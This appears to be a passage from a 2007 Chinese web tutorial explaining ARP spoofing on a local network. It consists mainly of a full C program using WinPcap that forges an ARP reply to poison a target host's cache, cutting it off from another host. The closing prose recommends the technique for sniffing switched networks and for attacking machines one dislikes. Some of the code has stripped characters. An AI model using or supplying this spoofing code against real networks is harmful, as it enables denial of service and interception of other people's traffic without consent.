实例讲解如何对目标进行ARP欺骗

　2007-09-01 13:09:49　来源：WEB开发网　　　

核心提示： 这可不是小事，局域网的网络流通可不是根据IP地址进行，实例讲解如何对目标进行ARP欺骗(3)，而是按照MAC地址进行传输，现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址，连骗带哄，甚至乱踹，现在A开始Ping 192.168.10.3，网卡递交的MAC地址是

这可不是小事。局域网的网络流通可不是根据IP地址进行，而是按照MAC地址进行传输。现在192.168.10.3的MAC地址在A上被改变成一个本不存在的MAC地址。现在A开始Ping 192.168.10.3，网卡递交的MAC地址是DD-DD-DD-DD-DD-DD，结果是什么呢？网络不通，A根本不能Ping通C！！这就是一个简单的ARP欺骗。

我们来实现这样的ARP欺骗。这里需要使用一个WinPcap提供的API和驱动。（http://winpcap.polito.it/），winpcap是一个伟大而且开放的项目。Windows环境下的nmap、snort、windump都是使用的winpcap。

// ARP Sender #include "stdafx.h" #include "Mac.h" //GetMacAddr()，我写的把字符串转换为MAC地址的函数，就不列在这里了 #include #include #define EPT_IP 0x0800 /* type: IP */ #define EPT_ARP 0x0806 /* type: ARP */ #define EPT_RARP 0x8035 /* type: RARP */ #define ARP_HARDWARE 0x0001 /* Dummy type for 802.3 frames */ #define ARP_REQUEST 0x0001 /* ARP request */ #define ARP_REPLY 0x0002 /* ARP reply */ #define Max_Num_Adapter 10 #pragma pack(push, 1) typedef struct ehhdr { unsigned char eh_dst[6]; /* destination ethernet addrress */ unsigned char eh_src[6]; /* source ethernet addresss */ unsigned short eh_type; /* ethernet pachet type */ }EHHDR, *PEHHDR; typedef struct arphdr { unsigned short arp_hrd; /* format of hardware address */ unsigned short arp_pro; /* format of protocol address */ unsigned char arp_hln; /* length of hardware address */ unsigned char arp_pln; /* length of protocol address */ unsigned short arp_op; /* ARP/RARP operation */ unsigned char arp_sha[6]; /* sender hardware address */ unsigned long arp_spa; /* sender protocol address */ unsigned char arp_tha[6]; /* target hardware address */ unsigned long arp_tpa; /* target protocol address */ }ARPHDR, *PARPHDR; typedef struct arpPacket { EHHDR ehhdr; ARPHDR arphdr; } ARPPACKET, *PARPPACKET; #pragma pack(pop) int main(int argc, char* argv[]) { static char AdapterList[Max_Num_Adapter][1024]; char szPacketBuf[600]; char MacAddr[6]; LPADAPTER lpAdapter; LPPACKET lpPacket; WCHAR AdapterName[2048]; WCHAR *temp,*temp1; ARPPACKET ARPPacket; ULONG AdapterLength = 1024; int AdapterNum = 0; int nRetCode, i;###NextPage### //Get The list of Adapter if(PacketGetAdapterNames((char*)AdapterName, &AdapterLength) == FALSE) { printf("Unable to retrieve the list of the adapters! "); return 0; } temp = AdapterName; temp1=AdapterName; i = 0; while ((*temp != )||(*(temp-1) != )) { if (*temp == ) { memcpy(AdapterList,temp1,(temp-temp1)*2); temp1=temp+1; i++; } temp++; } AdapterNum = i; for (i = 0; i < AdapterNum; i++) wprintf(L" %d- %s ", i+1, AdapterList); printf(" "); //Default open the 0 lpAdapter = (LPADAPTER) PacketOpenAdapter((LPTSTR) AdapterList[0]); //取第一个网卡（假设啦） if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE)) { nRetCode = GetLastError(); printf("Unable to open the driver, Error Code : %lx ", nRetCode); return 0; } lpPacket = PacketAllocatePacket(); if(lpPacket == NULL) { printf(" Error:failed to allocate the LPPACKET structure."); return 0; } ZeroMemory(szPacketBuf, sizeof(szPacketBuf)); if (!GetMacAddr("BBBBBBBBBBBB", MacAddr)) { printf ("Get Mac address error! "); } memcpy(ARPPacket.ehhdr.eh_dst, MacAddr, 6); //源MAC地址 if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) { printf ("Get Mac address error! "); return 0; } memcpy(ARPPacket.ehhdr.eh_src, MacAddr, 6); //目的MAC地址。（A的地址） ARPPacket.ehhdr.eh_type = htons(EPT_ARP); ARPPacket.arphdr.arp_hrd = htons(ARP_HARDWARE); ARPPacket.arphdr.arp_pro = htons(EPT_IP); ARPPacket.arphdr.arp_hln = 6; ARPPacket.arphdr.arp_pln = 4; ARPPacket.arphdr.arp_op = htons(ARP_REPLY); if (!GetMacAddr("DDDDDDDDDDDD", MacAddr)) { printf ("Get Mac address error! "); return 0; } memcpy(ARPPacket.arphdr.arp_sha, MacAddr, 6); //伪造的C的MAC地址 ARPPacket.arphdr.arp_spa = inet_addr("192.168.10.3"); //C的IP地址 if (!GetMacAddr("AAAAAAAAAAAA", MacAddr)) { printf ("Get Mac address error! "); return 0; } memcpy(ARPPacket.arphdr.arp_tha , MacAddr, 6); //目标A的MAC地址 ARPPacket.arphdr.arp_tpa = inet_addr("192.168.10.1"); //目标A的IP地址 memcpy(szPacketBuf, (char*)&ARPPacket, sizeof(ARPPacket)); PacketInitPacket(lpPacket, szPacketBuf, 60); if(PacketSetNumWrites(lpAdapter, 2)==FALSE) { printf("warning: Unable to send more than one packet in a single write! "); } if(PacketSendPacket(lpAdapter, lpPacket, TRUE)==FALSE) { printf("Error sending the packets! "); return 0; } printf ("Send ok! ");###NextPage### // close the adapter and exit PacketFreePacket(lpPacket); PacketCloseAdapter(lpAdapter); return 0; }

于是A接收到一个被伪造的ARP应答。A被欺骗了！！倘若在局域网中看某某机器不顺眼，以太网中的嗅探太有作用了，但是交换网络对嗅探进行了限制，让嗅探深入程度大打折扣。不过，很容易就能够发现，主机、Switch（动态更新地址表类型，下同）中的缓存表依然是（主要是）动态的。要在一个交换网络中进行有效的嗅探工作（地下党？），需要采用对付各种缓存表的办法，连骗带哄，甚至乱踹，在上面的ARP欺骗基础中我们就能够做到。